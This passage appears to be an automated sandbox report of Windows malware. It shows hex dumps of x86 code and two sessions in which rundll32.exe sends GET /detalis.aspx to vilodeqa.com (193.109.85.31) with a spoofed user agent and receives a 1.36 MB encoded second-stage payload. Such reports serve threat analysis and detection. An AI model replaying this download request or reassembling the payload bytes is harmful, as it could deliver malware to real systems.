                    Data Ascii: Wfc$wtiUCS0UtM3EM`d'M't~EUEMu3W
                    2024-10-06 11:25:12 UTC16384INData Raw: 00 83 c4 18 a2 4e f0 07 10 0f b6 15 4e f0 07 10 85 d2 7f 0c c7 85 00 ff ff ff 01 00 00 00 eb 0a c7 85 00 ff ff ff 00 00 00 00 0f b6 05 4e f0 07 10 83 f8 52 7f 0c c7 85 fc fe ff ff 01 00 00 00 eb 0a c7 85 fc fe ff ff 00 00 00 00 8b 8d 00 ff ff ff 3b 8d fc fe ff ff 74 1d 8b 15 60 f1 07 10 a1 64 f1 07 10 89 55 88 89 45 8c c7 05 50 f1 07 10 52 83 f5 d0 eb 4b 83 7d cc 00 74 0f 0f b6 0d 4e f0 07 10 89 8d f8 fe ff ff eb 09 8b 55 c8 89 95 f8 fe ff ff 8b 85 f8 fe ff ff 89 45 cc 0f b7 0d 68 f1 07 10 85 c9 75 09 c6 85 73 ff ff ff 01 eb 07 c6 85 73 ff ff ff 00 8a 95 73 ff ff ff 88 55 ee a1 98 f1 07 10 8b 0d 9c f1 07 10 89 85 dc fb ff ff 89 8d e0 fb ff ff 8b 95 dc fb ff ff 0b 95 e0 fb ff ff 0f 84 c5 01 00 00 8b 45 c0 3b 45 c0 0f 8c 08 01 00 00 7f 0c 8b 4d bc 3b 4d bc
                    Data Ascii: NNNR;t`dUEPRK}tNUEhusssUE;EM;M
                    2024-10-06 11:25:12 UTC16384INData Raw: 99 8b c8 2b 0d c0 f1 07 10 0f bf 05 5c f1 07 10 99 03 c1 66 a3 5c f1 07 10 68 00 80 00 00 6a 00 8b 95 74 ff ff ff 52 6a 00 6a 00 e8 3c a8 fe ff 83 c4 08 ff d0 a1 c0 f1 07 10 50 ff 15 5c 70 06 10 88 45 ed 0f b6 4d ed 85 c9 0f 8c 26 01 00 00 0f b6 15 27 f0 07 10 85 d2 75 14 33 c0 c7 85 a0 fc ff ff 01 00 00 00 89 85 a4 fc ff ff eb 0b 0f 57 c0 66 0f 13 85 a0 fc ff ff 8b 0d 50 f1 07 10 33 f6 8b 15 20 f1 07 10 f7 d2 a1 24 f1 07 10 f7 d0 03 ca 13 f0 8b 45 c8 f7 d0 8b 55 98 f7 d2 2b c2 99 52 50 56 51 e8 01 36 04 00 89 85 34 fa ff ff 89 95 38 fa ff ff 8b 85 34 fa ff ff 0b 85 38 fa ff ff 75 14 33 c9 c7 85 98 fc ff ff 01 00 00 00 89 8d 9c fc ff ff eb 0b 0f 57 c0 66 0f 13 85 98 fc ff ff 8b 95 a0 fc ff ff 03 15 20 f1 07 10 8b 85 a4 fc ff ff 13 05 24 f1 07 10 8b 4d 88
                    Data Ascii: +\f\hjtRjj<P\pEM&'u3WfP3 $EU+RPVQ64848u3Wf $M
                    2024-10-06 11:25:12 UTC16384INData Raw: 89 90 24 b5 1d 10 0f bf 05 a8 f1 07 10 d1 e0 a2 26 f0 07 10 8b 0d 80 f1 07 10 89 4d b4 e9 4d 01 00 00 0f b6 45 ef f7 d0 99 8b 4d a4 8b 75 a8 89 8d 58 fb ff ff 89 b5 5c fb ff ff 89 85 50 fb ff ff 89 95 54 fb ff ff 8b 95 5c fb ff ff 3b 95 54 fb ff ff 7f 1c 7c 0e 8b 85 58 fb ff ff 3b 85 50 fb ff ff 77 0c c7 85 0c fe ff ff 01 00 00 00 eb 0a c7 85 0c fe ff ff 00 00 00 00 0f bf 4d dc 39 8d 0c fe ff ff 7c 32 8b 15 b0 f1 07 10 81 ea 60 40 0d 64 89 55 ac 0f bf 45 e0 99 8b 0d 20 f1 07 10 f7 d1 2b c8 89 0d 70 f1 07 10 ba 16 00 00 00 66 89 55 d8 e9 b6 00 00 00 83 3d 40 f1 07 10 00 74 62 0f bf 45 e0 8b 4d 84 2b c8 8b 55 84 2b d1 89 55 84 8b 0d 54 f1 07 10 33 f6 0f b6 05 26 f0 07 10 99 8b 7d 9c 8b 5d a0 03 f8 13 da 33 f9 33 de 0f b6 45 ec 99 2b c7 1b d3 89 45 cc 89 55
                    Data Ascii: $&MMEMuX\PT\;T|X;PwM9|2`@dUE +pfU=@tbEM+U+UT3&}]33E+EU
                    2024-10-06 11:25:12 UTC16384INData Raw: fe ff ff 89 85 90 fe ff ff 89 95 94 fe ff ff 8b 95 9c fe ff ff 3b 95 94 fe ff ff 7c 68 7f 0e 8b 85 98 fe ff ff 3b 85 90 fe ff ff 72 58 0f b7 0d 28 f1 07 10 85 c9 74 25 33 d2 c7 05 30 f1 07 10 80 76 25 db 89 15 34 f1 07 10 0f bf 05 5c f1 07 10 0f af 45 cc 66 a3 5c f1 07 10 eb 28 8b 8d 70 ff ff ff 83 c1 5b 66 89 4d e4 0f b6 55 ed 33 55 bc 89 15 44 f1 07 10 0f bf 45 e0 05 ec e9 19 27 a3 a4 f1 07 10 8b 4d 90 81 c1 60 01 00 00 89 8d 54 ff ff ff ff 15 24 70 06 10 89 45 c8 8b 55 90 81 c2 c6 03 00 00 89 95 bc fe ff ff 0f b7 05 a0 f1 07 10 0f be 4d ef 2b c1 66 a3 b8 f1 07 10 0f bf 55 e8 03 55 c8 75 0c c7 85 58 ff ff ff 01 00 00 00 eb 0a c7 85 58 ff ff ff 00 00 00 00 83 7d c8 00 75 0c c7 85 5c ff ff ff 01 00 00 00 eb 0a c7 85 5c ff ff ff 00 00 00 00 83 3d 54 f1 07
                    Data Ascii: ;|h;rX(t%30v%4\Ef\(p[fMU3UDE'M`T$pEUM+fUUuXX}u\\=T
                    2024-10-06 11:25:13 UTC16384INData Raw: 00 ba 85 5a f7 88 2b d0 f7 d2 66 89 15 28 f1 07 10 0f bf 45 e8 99 05 4b 33 2c 40 81 d2 e7 1a 08 00 a3 60 f1 07 10 89 15 64 f1 07 10 8b 4d d8 03 4d 94 8b 45 d8 d3 e8 89 45 d8 e9 a1 00 00 00 0f b7 0d 4c f1 07 10 39 4d a8 0f 8f 91 00 00 00 0f b6 15 27 f0 07 10 69 c2 5f ee ad 98 33 c9 a3 88 f1 07 10 89 0d 8c f1 07 10 8b 15 88 f1 07 10 0b 15 8c f1 07 10 75 0c c7 85 30 fe ff ff 01 00 00 00 eb 0a c7 85 30 fe ff ff 00 00 00 00 0f b7 45 e4 0b 85 30 fe ff ff 75 0c c7 85 2c fe ff ff 01 00 00 00 eb 0a c7 85 2c fe ff ff 00 00 00 00 0f b7 0d b8 f1 07 10 0f af 4d a4 03 8d 2c fe ff ff 0f b7 15 4c f1 07 10 0f bf 45 e0 33 d0 8b 45 ac 03 45 a4 f7 d0 2b d0 03 ca 66 89 0d 48 f1 07 10 eb 32 33 c9 c7 05 88 f1 07 10 8e 00 00 00 89 0d 8c f1 07 10 8b 15 58 f1 07 10 81 ea 6f 78 00
                    Data Ascii: Z+f(EK3,@`dMMEEL9M'i_3u00E0u,,M,LE3EE+fH23Xox


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749701193.109.85.314437404C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    2024-10-06 11:25:16 UTC107OUTGET /detalis.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: vilodeqa.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:16 UTC254INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:16 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sat, 05 Oct 2024 05:36:27 GMT
                    ETag: "14cc02-623b42b499466"
                    Accept-Ranges: bytes
                    Content-Length: 1362946
                    Connection: close
                    2024-10-06 11:25:16 UTC7938INData Raw: 49 44 48 66 51 57 51 79 4d 7a 5a 65 62 6b 74 4b 6b 70 52 50 51 64 38 79 4d 7a 5a 61 62 6b 74 4b 4c 57 74 50 51 57 63 79 4d 7a 5a 61 62 6b 74 4b 62 57 74 50 51 57 63 79 4d 7a 5a 61 62 6b 74 4b 0d 0a 62 57 74 50 51 57 63 79 4d 7a 5a 61 62 6b 74 4b 64 57 70 50 51 57 6b 74 69 54 68 61 32 6b 4b 48 54 4e 4e 4f 44 61 6f 54 5a 31 34 7a 48 57 73 36 48 77 51 6f 4d 77 5a 66 45 31 55 37 41 43 55 6c 0d 0a 47 55 73 74 4a 45 64 41 52 6c 68 36 42 79 56 71 4b 53 51 63 59 51 70 64 56 31 4e 30 59 30 5a 41 53 57 74 50 51 57 63 79 4d 7a 62 50 34 36 4a 6b 76 49 66 49 50 4c 62 65 74 45 75 4c 67 73 77 33 0d 0a 62 2f 58 4c 50 62 33 65 74 45 74 59 38 4d 6b 32 48 59 66 49 50 4c 42 66 73 45 71 62 67 73 77 33 75 67 62 4c 50 61 44 65 74 45 74 59 38 4d 67 32 71 6f 66 49 50 4c 42 66 73
                    Data Ascii: IDHfQWQyMzZebktKkpRPQd8yMzZabktKLWtPQWcyMzZabktKbWtPQWcyMzZabktKbWtPQWcyMzZabktKdWpPQWktiTha2kKHTNNODaoTZ14zHWs6HwQoMwZfE1U7ACUlGUstJEdARlh6ByVqKSQcYQpdV1N0Y0ZASWtPQWcyMzbP46JkvIfIPLbetEuLgsw3b/XLPb3etEtY8Mk2HYfIPLBfsEqbgsw3ugbLPaDetEtY8Mg2qofIPLBfs
                    2024-10-06 11:25:16 UTC16384INData Raw: 6c 41 55 57 62 41 50 43 64 65 53 73 41 66 6b 54 6d 6e 30 45 4d 7a 4d 37 57 65 59 73 41 48 6b 59 4d 70 32 47 4d 79 75 48 4f 6d 35 61 34 58 0d 0a 72 32 39 50 6a 61 76 2b 2f 2f 71 57 6f 6f 65 47 6f 61 65 44 6a 54 4b 35 33 37 57 32 52 73 49 48 6b 56 69 50 79 69 72 4f 75 6a 66 54 4c 30 2f 44 4c 47 50 45 46 4a 76 31 63 54 4a 62 62 6b 74 4b 0d 0a 35 69 36 7a 68 69 63 36 4d 6a 5a 61 62 73 41 48 6b 61 78 4f 46 66 49 2b 49 37 30 50 59 73 49 66 68 65 41 4b 53 65 35 33 31 37 30 58 6b 73 69 4c 59 65 49 43 72 65 78 6e 33 37 38 50 6c 73 41 50 0d 0a 68 65 49 4b 6f 65 78 2f 31 37 38 58 73 73 41 66 6a 65 42 4e 79 43 4c 71 75 48 75 47 35 56 72 44 4f 4a 2f 45 42 4a 2f 31 4d 39 49 73 59 6c 76 42 49 4a 4f 49 51 43 39 46 50 79 62 52 4f 37 50 42 0d 0a 4b 4a 2f 47 41 32 4f 78 54
                    Data Ascii: lAUWbAPCdeSsAfkTmn0EMzM7WeYsAHkYMp2GMyuHOm5a4Xr29Pjav+//qWooeGoaeDjTK537W2RsIHkViPyirOujfTL0/DLGPEFJv1cTJbbktK5i6zhic6MjZabsAHkaxOFfI+I70PYsIfheAKSe53170XksiLYeICrexn378PlsAPheIKoex/178XssAfjeBNyCLquHuG5VrDOJ/EBJ/1M9IsYlvBIJOIQC9FPybRO7PBKJ/GA2OxT
                    2024-10-06 11:25:16 UTC16384INData Raw: 36 37 51 47 63 79 4d 39 31 64 71 51 36 2b 62 57 74 50 51 65 31 6e 78 37 34 50 6b 45 54 38 0d 0a 4b 4a 58 4b 67 52 4e 70 39 48 4f 43 62 6b 74 4b 62 65 41 43 55 65 35 2f 33 37 30 50 59 73 49 66 6e 65 41 4b 73 65 35 33 2f 37 30 58 67 73 49 48 76 65 59 61 6a 65 35 6e 30 2f 45 66 75 6b 74 4b 0d 0a 62 57 76 45 42 45 65 37 64 74 4c 52 49 31 66 44 49 49 50 45 46 49 2b 37 5a 76 4c 52 4b 36 2f 44 4b 4b 50 43 44 4b 4f 37 66 75 72 52 4f 36 73 59 35 69 61 54 71 58 4d 50 4d 6a 61 7a 65 62 53 31 0d 0a 6b 75 41 4b 53 65 78 2f 4c 37 30 50 54 73 4a 43 35 44 74 4c 79 69 49 36 75 4e 4d 48 72 59 65 47 6f 61 65 44 6a 61 76 2b 2f 2f 6f 50 35 61 63 58 72 71 65 44 6a 61 76 2b 2f 2f 71 57 6f 6f 65 47 0d 0a 4f 4f 43 6a 45 49 77 37 75 48 4e 53 37 59 74 61 35 43 35 48 79 69 6f 36 43
                    Data Ascii: 67QGcyM91dqQ6+bWtPQe1nx74PkET8KJXKgRNp9HOCbktKbeACUe5/370PYsIfneAKse53/70XgsIHveYaje5n0/EfuktKbWvEBEe7dtLRI1fDIIPEFI+7ZvLRK6/DKKPCDKO7furRO6sY5iaTqXMPMjazebS1kuAKSex/L70PTsJC5DtLyiI6uNMHrYeGoaeDjav+//oP5acXrqeDjav+//qWooeGOOCjEIw7uHNS7Yta5C5Hyio6C
                    2024-10-06 11:25:17 UTC16384INData Raw: 54 47 46 47 75 37 64 69 62 52 49 35 50 44 0d 0a 49 50 50 45 46 47 75 35 64 69 62 54 2b 31 75 31 6b 70 54 47 78 48 50 4e 7a 4d 6d 78 5a 38 41 48 39 65 69 6d 51 4f 35 2f 71 37 55 6e 39 6b 73 38 63 2b 62 61 55 5a 6a 4e 7a 4c 2f 50 33 72 57 31 0d 0a 6b 6d 54 35 42 48 39 69 75 4c 76 71 6b 4c 53 31 68 55 52 65 51 47 66 5a 34 4c 33 58 66 72 53 31 6b 75 44 61 56 5a 6a 4e 7a 4c 2f 58 4a 72 57 31 6b 75 4c 61 44 5a 6e 4e 7a 4c 33 66 4a 72 57 31 0d 0a 6b 75 44 43 44 5a 6e 4e 7a 4c 38 66 59 73 49 48 66 61 77 4b 6d 57 63 79 4d 7a 61 7a 6c 55 74 4b 62 65 62 61 59 5a 6e 4e 7a 4c 38 50 2b 73 41 50 2b 65 4c 4b 65 5a 6a 4e 7a 4c 30 58 2b 73 67 7a 0d 0a 65 57 51 35 54 61 43 33 44 38 6d 6c 6b 55 70 4b 62 57 75 6b 53 36 43 33 44 38 6d 6c 6b 55 74 4b 62 57 76 46 31 46 76 4e 7a
                    Data Ascii: TGFGu7dibRI5PDIPPEFGu5dibT+1u1kpTGxHPNzMmxZ8AH9eimQO5/q7Un9ks8c+baUZjNzL/P3rW1kmT5BH9iuLvqkLS1hUReQGfZ4L3XfrS1kuDaVZjNzL/XJrW1kuLaDZnNzL3fJrW1kuDCDZnNzL8fYsIHfawKmWcyMzazlUtKbebaYZnNzL8P+sAP+eLKeZjNzL0X+sgzeWQ5TaC3D8mlkUpKbWukS6C3D8mlkUtKbWvF1FvNz
                    2024-10-06 11:25:17 UTC16384INData Raw: 73 65 42 65 79 69 4c 65 75 69 62 58 49 35 50 44 49 4c 2f 45 46 49 75 35 64 75 4c 52 5a 73 49 41 61 61 77 4b 76 57 63 79 4d 7a 62 52 4f 30 50 44 4f 4b 66 45 42 4d 75 37 64 75 62 52 49 35 76 44 0d 0a 49 4b 2f 45 46 4b 75 37 5a 74 37 52 4b 36 50 44 4b 4b 50 45 44 4b 2b 37 66 6f 62 58 4f 37 6b 59 35 69 36 6e 45 65 78 2f 39 39 36 32 45 37 53 31 42 32 76 43 44 4d 39 6a 32 38 66 53 6b 62 54 4a 0d 0a 71 57 4e 41 39 37 65 33 34 55 4e 4e 42 6c 31 32 62 57 73 6e 45 52 41 2b 49 31 35 79 34 45 64 61 68 51 74 30 53 32 65 78 39 7a 71 64 4b 34 74 4b 62 57 74 50 7a 43 71 65 75 6e 75 2b 35 52 36 75 0d 0a 35 6d 6e 47 42 4e 75 35 66 74 4c 52 4f 34 76 44 66 4f 41 4b 2f 65 35 33 69 37 30 58 31 73 49 48 32 61 77 4b 76 5a 6a 4e 7a 4d 6e 58 49 2b 4f 69 31 62 4a 50 51 65 78 33 68
                    Data Ascii: seBeyiLeuibXI5PDIL/EFIu5duLRZsIAaawKvWcyMzbRO0PDOKfEBMu7dubRI5vDIK/EFKu7Zt7RK6PDKKPEDK+7fobXO7kY5i6nEex/9962E7S1B2vCDM9j28fSkbTJqWNA97e34UNNBl12bWsnERA+I15y4EdahQt0S2ex9zqdK4tKbWtPzCqeunu+5R6u5mnGBNu5ftLRO4vDfOAK/e53i70X1sIH2awKvZjNzMnXI+Oi1bJPQex3h
                    2024-10-06 11:25:17 UTC16384INData Raw: 32 7a 36 6c 78 4c 55 39 74 37 74 61 62 6b 76 48 4b 4b 66 47 78 42 66 4e 7a 4d 6e 5a 67 6c 76 42 6f 65 4c 71 67 5a 6e 4e 7a 4c 33 50 48 72 53 31 0d 0a 6b 6a 6d 6e 47 42 55 79 4d 37 30 66 6e 73 42 43 68 51 54 39 51 57 66 30 64 74 39 62 35 51 61 36 35 6e 72 47 31 41 2f 4e 7a 4d 6e 58 4b 36 4c 44 36 41 65 77 76 70 69 35 66 6a 37 52 2b 79 65 31 0d 0a 6b 70 54 46 51 2b 38 7a 76 72 73 79 6b 62 53 31 35 4f 59 72 76 70 6a 4e 75 47 4e 53 35 63 34 75 6b 70 53 77 79 6d 2b 37 65 54 4b 64 4b 37 65 31 6b 70 53 77 7a 43 72 2b 32 2b 65 45 62 55 74 46 0d 0a 32 7a 36 44 45 2b 70 2f 35 39 35 65 46 6b 39 4b 35 69 35 48 71 49 30 32 4d 7a 62 52 4b 37 76 4a 72 57 2f 47 78 41 66 4e 7a 4d 6e 6a 61 6b 74 4b 62 51 43 65 76 75 79 33 55 38 6d 6c 6b 55 67 61 0d 0a 61 65 4c 61 48 5a 6a
                    Data Ascii: 2z6lxLU9t7tabkvHKKfGxBfNzMnZglvBoeLqgZnNzL3PHrS1kjmnGBUyM70fnsBChQT9QWf0dt9b5Qa65nrG1A/NzMnXK6LD6Aewvpi5fj7R+ye1kpTFQ+8zvrsykbS15OYrvpjNuGNS5c4ukpSwym+7eTKdK7e1kpSwzCr+2+eEbUtF2z6DE+p/595eFk9K5i5HqI02MzbRK7vJrW/GxAfNzMnjaktKbQCevuy3U8mlkUgaaeLaHZj
                    2024-10-06 11:25:17 UTC16384INData Raw: 6b 75 49 4b 71 65 78 2f 32 37 77 50 6c 73 4e 62 59 74 30 4b 75 54 65 35 66 74 37 5a 72 30 4f 69 0d 0a 6b 51 5a 50 51 65 78 2f 32 39 37 2b 33 6b 68 4b 35 69 61 7a 79 6d 37 61 32 62 56 61 62 73 41 66 6b 65 42 4e 71 41 4d 77 4d 7a 62 52 4b 37 66 4a 72 57 2f 47 42 4b 4f 4c 4e 7a 5a 61 62 69 43 62 0d 0a 6b 75 41 4b 68 57 52 69 4e 37 38 50 72 73 41 48 72 65 42 65 79 44 4b 4f 75 48 50 6d 37 6e 4e 49 47 47 4b 49 42 4c 38 7a 4d 7a 5a 61 68 55 79 4e 4b 4c 4e 50 51 57 63 79 75 58 75 43 35 67 61 34 0d 0a 59 74 30 61 73 2b 4c 67 52 6d 6e 52 4b 37 66 4a 72 57 2f 47 42 4e 2b 4c 4e 7a 5a 61 62 69 43 62 6b 75 41 4b 2b 57 52 69 4e 37 38 50 32 73 41 48 32 65 42 65 79 44 4b 43 75 48 50 71 37 6e 4e 4c 0d 0a 47 47 4b 49 42 4c 4d 7a 4d 7a 5a 61 68 55 79 4e 4b 4c 39 50 51 57 63
                    Data Ascii: kuIKqex/27wPlsNbYt0KuTe5ft7Zr0OikQZPQex/297+3khK5iazym7a2bVabsAfkeBNqAMwMzbRK7fJrW/GBKOLNzZabiCbkuAKhWRiN78PrsAHreBeyDKOuHPm7nNIGGKIBL8zMzZahUyNKLNPQWcyuXuC5ga4Yt0as+LgRmnRK7fJrW/GBN+LNzZabiCbkuAK+WRiN78P2sAH2eBeyDKCuHPq7nNLGGKIBLMzMzZahUyNKL9PQWc
                    2024-10-06 11:25:17 UTC16384INData Raw: 4f 50 6f 64 7a 4f 6f 61 7a 38 6d 6c 68 6c 57 69 0d 0a 6b 35 53 4a 42 4a 73 6e 39 48 50 43 6d 73 35 47 66 65 41 4b 32 65 54 79 4d 72 2f 66 41 72 57 31 6b 75 41 43 32 65 30 6a 75 32 50 6e 37 51 37 53 62 4f 73 79 2f 47 64 48 33 62 30 66 39 6d 44 50 0d 0a 41 5a 57 77 76 75 36 33 57 38 69 6c 6b 63 44 48 42 5a 57 77 76 75 36 2f 56 38 69 6c 6b 63 44 66 43 5a 57 77 76 75 36 6e 55 38 69 6c 6b 63 44 50 44 5a 57 77 76 6a 64 61 78 37 4e 57 66 73 62 48 0d 0a 52 5a 65 77 76 6f 38 56 4f 4d 6d 6c 71 41 36 32 65 2b 62 43 61 5a 76 4e 7a 47 63 77 66 73 62 66 37 5a 47 77 76 6a 57 35 66 73 61 79 35 56 70 50 62 65 4c 4b 48 5a 6e 4e 7a 4c 33 66 4d 72 57 31 0d 0a 6b 75 4c 4b 47 5a 6e 4e 7a 50 41 66 6b 6c 7a 42 49 4a 76 4d 67 43 65 35 49 72 2f 50 4f 72 61 31 6b 75 41 4f 52 65 36
                    Data Ascii: OPodzOoaz8mlhlWik5SJBJsn9HPCms5GfeAK2eTyMr/fArW1kuAC2e0ju2Pn7Q7SbOsy/GdH3b0f9mDPAZWwvu63W8ilkcDHBZWwvu6/V8ilkcDfCZWwvu6nU8ilkcDPDZWwvjdax7NWfsbHRZewvo8VOMmlqA62e+bCaZvNzGcwfsbf7ZGwvjW5fsay5VpPbeLKHZnNzL3fMrW1kuLKGZnNzPAfklzBIJvMgCe5Ir/POra1kuAORe6
                    2024-10-06 11:25:17 UTC16384INData Raw: 0d 0a 59 6a 79 50 73 32 67 6a 63 57 36 79 37 54 4e 4d 62 65 41 43 76 65 39 7a 55 37 30 66 6b 73 43 76 4d 4b 6c 4c 51 61 76 2b 2f 2f 6f 50 35 61 66 4a 67 55 66 47 44 4a 75 35 64 6a 37 54 4b 37 2f 42 0d 0a 49 4a 2f 47 44 4c 4f 35 5a 73 72 54 4f 37 76 42 4b 4a 76 47 42 4a 2b 35 66 73 36 64 62 30 74 4b 62 57 76 45 46 4a 2f 31 63 54 4a 61 62 6b 74 4b 35 69 35 48 79 6d 2b 37 66 74 72 52 4f 36 66 44 0d 0a 4f 49 50 43 42 49 2b 37 64 75 72 52 49 30 50 42 66 4f 42 4e 79 43 4c 57 75 48 75 2b 35 77 61 71 34 44 36 76 79 44 4c 71 75 48 4f 47 35 55 4d 62 35 6a 36 58 79 6d 56 69 75 48 75 6d 68 6e 57 70 0d 0a 6b 35 54 45 42 4a 75 35 31 6d 75 59 61 6b 75 47 6f 61 65 44 6a 54 4b 35 33 37 57 32 65 73 49 48 6b 65 41 4b 76 65 35 33 78 37 30 58 6d 73 49 48 6c 65 41 61 75 61 41
                    Data Ascii: YjyPs2gjcW6y7TNMbeACve9zU70fksCvMKlLQav+//oP5afJgUfGDJu5dj7TK7/BIJ/GDLO5ZsrTO7vBKJvGBJ+5fs6db0tKbWvEFJ/1cTJabktK5i5Hym+7ftrRO6fDOIPCBI+7durRI0PBfOBNyCLWuHu+5waq4D6vyDLquHOG5UMb5j6XymViuHumhnWpk5TEBJu51muYakuGoaeDjTK537W2esIHkeAKve53x70XmsIHleAauaA
                    2024-10-06 11:25:17 UTC16384INData Raw: 38 77 5a 4b 77 4b 68 57 59 79 4d 7a 61 78 61 59 77 50 71 57 74 50 51 57 65 34 64 76 4b 7a 52 55 70 4b 62 59 4a 72 51 47 63 79 73 30 75 70 61 44 34 4c 0d 0a 37 52 61 39 52 68 49 4a 75 48 74 53 35 51 70 43 35 6a 70 44 79 71 2f 61 53 56 70 53 62 73 41 48 59 51 31 41 62 79 59 36 72 4d 43 65 4b 6a 46 44 71 69 36 50 51 47 63 79 4d 39 31 64 71 51 36 4b 0d 0a 62 57 74 50 51 65 31 33 38 39 2b 2b 62 6b 74 4b 68 4c 5a 50 51 57 65 79 54 73 56 64 47 77 6a 4b 45 4a 6c 4a 4e 46 71 35 5a 6a 72 52 4a 45 50 42 50 32 65 6e 64 41 73 36 4d 37 30 66 5a 72 6c 46 0d 0a 66 53 4e 48 4a 32 67 63 2b 36 6d 73 71 67 38 77 5a 4b 77 4b 2f 57 59 79 4d 7a 61 78 61 59 77 50 30 57 74 50 51 57 65 34 64 6f 71 7a 39 55 74 4b 62 59 4c 62 51 57 63 79 73 30 75 70 61 44 34 50 0d 0a 37 52 61 39 52
                    Data Ascii: 8wZKwKhWYyMzaxaYwPqWtPQWe4dvKzRUpKbYJrQGcys0upaD4L7Ra9RhIJuHtS5QpC5jpDyq/aSVpSbsAHYQ1AbyY6rMCeKjFDqi6PQGcyM91dqQ6KbWtPQe1389++bktKhLZPQWeyTsVdGwjKEJlJNFq5ZjrRJEPBP2endAs6M70fZrlFfSNHJ2gc+6msqg8wZKwK/WYyMzaxaYwP0WtPQWe4doqz9UtKbYLbQWcys0upaD4P7Ra9R


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749702193.109.85.314437520C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    2024-10-06 11:25:16 UTC107OUTGET /detalis.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: vilodeqa.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:16 UTC254INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:16 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sat, 05 Oct 2024 05:36:27 GMT
                    ETag: "14cc02-623b42b499466"
                    Accept-Ranges: bytes
                    Content-Length: 1362946
                    Connection: close
                    2024-10-06 11:25:16 UTC7938INData Raw: 49 44 48 66 51 57 51 79 4d 7a 5a 65 62 6b 74 4b 6b 70 52 50 51 64 38 79 4d 7a 5a 61 62 6b 74 4b 4c 57 74 50 51 57 63 79 4d 7a 5a 61 62 6b 74 4b 62 57 74 50 51 57 63 79 4d 7a 5a 61 62 6b 74 4b 0d 0a 62 57 74 50 51 57 63 79 4d 7a 5a 61 62 6b 74 4b 64 57 70 50 51 57 6b 74 69 54 68 61 32 6b 4b 48 54 4e 4e 4f 44 61 6f 54 5a 31 34 7a 48 57 73 36 48 77 51 6f 4d 77 5a 66 45 31 55 37 41 43 55 6c 0d 0a 47 55 73 74 4a 45 64 41 52 6c 68 36 42 79 56 71 4b 53 51 63 59 51 70 64 56 31 4e 30 59 30 5a 41 53 57 74 50 51 57 63 79 4d 7a 62 50 34 36 4a 6b 76 49 66 49 50 4c 62 65 74 45 75 4c 67 73 77 33 0d 0a 62 2f 58 4c 50 62 33 65 74 45 74 59 38 4d 6b 32 48 59 66 49 50 4c 42 66 73 45 71 62 67 73 77 33 75 67 62 4c 50 61 44 65 74 45 74 59 38 4d 67 32 71 6f 66 49 50 4c 42 66 73
                    Data Ascii: IDHfQWQyMzZebktKkpRPQd8yMzZabktKLWtPQWcyMzZabktKbWtPQWcyMzZabktKbWtPQWcyMzZabktKdWpPQWktiTha2kKHTNNODaoTZ14zHWs6HwQoMwZfE1U7ACUlGUstJEdARlh6ByVqKSQcYQpdV1N0Y0ZASWtPQWcyMzbP46JkvIfIPLbetEuLgsw3b/XLPb3etEtY8Mk2HYfIPLBfsEqbgsw3ugbLPaDetEtY8Mg2qofIPLBfs
                    2024-10-06 11:25:16 UTC16384INData Raw: 6c 41 55 57 62 41 50 43 64 65 53 73 41 66 6b 54 6d 6e 30 45 4d 7a 4d 37 57 65 59 73 41 48 6b 59 4d 70 32 47 4d 79 75 48 4f 6d 35 61 34 58 0d 0a 72 32 39 50 6a 61 76 2b 2f 2f 71 57 6f 6f 65 47 6f 61 65 44 6a 54 4b 35 33 37 57 32 52 73 49 48 6b 56 69 50 79 69 72 4f 75 6a 66 54 4c 30 2f 44 4c 47 50 45 46 4a 76 31 63 54 4a 62 62 6b 74 4b 0d 0a 35 69 36 7a 68 69 63 36 4d 6a 5a 61 62 73 41 48 6b 61 78 4f 46 66 49 2b 49 37 30 50 59 73 49 66 68 65 41 4b 53 65 35 33 31 37 30 58 6b 73 69 4c 59 65 49 43 72 65 78 6e 33 37 38 50 6c 73 41 50 0d 0a 68 65 49 4b 6f 65 78 2f 31 37 38 58 73 73 41 66 6a 65 42 4e 79 43 4c 71 75 48 75 47 35 56 72 44 4f 4a 2f 45 42 4a 2f 31 4d 39 49 73 59 6c 76 42 49 4a 4f 49 51 43 39 46 50 79 62 52 4f 37 50 42 0d 0a 4b 4a 2f 47 41 32 4f 78 54
                    Data Ascii: lAUWbAPCdeSsAfkTmn0EMzM7WeYsAHkYMp2GMyuHOm5a4Xr29Pjav+//qWooeGoaeDjTK537W2RsIHkViPyirOujfTL0/DLGPEFJv1cTJbbktK5i6zhic6MjZabsAHkaxOFfI+I70PYsIfheAKSe53170XksiLYeICrexn378PlsAPheIKoex/178XssAfjeBNyCLquHuG5VrDOJ/EBJ/1M9IsYlvBIJOIQC9FPybRO7PBKJ/GA2OxT
                    2024-10-06 11:25:16 UTC16384INData Raw: 36 37 51 47 63 79 4d 39 31 64 71 51 36 2b 62 57 74 50 51 65 31 6e 78 37 34 50 6b 45 54 38 0d 0a 4b 4a 58 4b 67 52 4e 70 39 48 4f 43 62 6b 74 4b 62 65 41 43 55 65 35 2f 33 37 30 50 59 73 49 66 6e 65 41 4b 73 65 35 33 2f 37 30 58 67 73 49 48 76 65 59 61 6a 65 35 6e 30 2f 45 66 75 6b 74 4b 0d 0a 62 57 76 45 42 45 65 37 64 74 4c 52 49 31 66 44 49 49 50 45 46 49 2b 37 5a 76 4c 52 4b 36 2f 44 4b 4b 50 43 44 4b 4f 37 66 75 72 52 4f 36 73 59 35 69 61 54 71 58 4d 50 4d 6a 61 7a 65 62 53 31 0d 0a 6b 75 41 4b 53 65 78 2f 4c 37 30 50 54 73 4a 43 35 44 74 4c 79 69 49 36 75 4e 4d 48 72 59 65 47 6f 61 65 44 6a 61 76 2b 2f 2f 6f 50 35 61 63 58 72 71 65 44 6a 61 76 2b 2f 2f 71 57 6f 6f 65 47 0d 0a 4f 4f 43 6a 45 49 77 37 75 48 4e 53 37 59 74 61 35 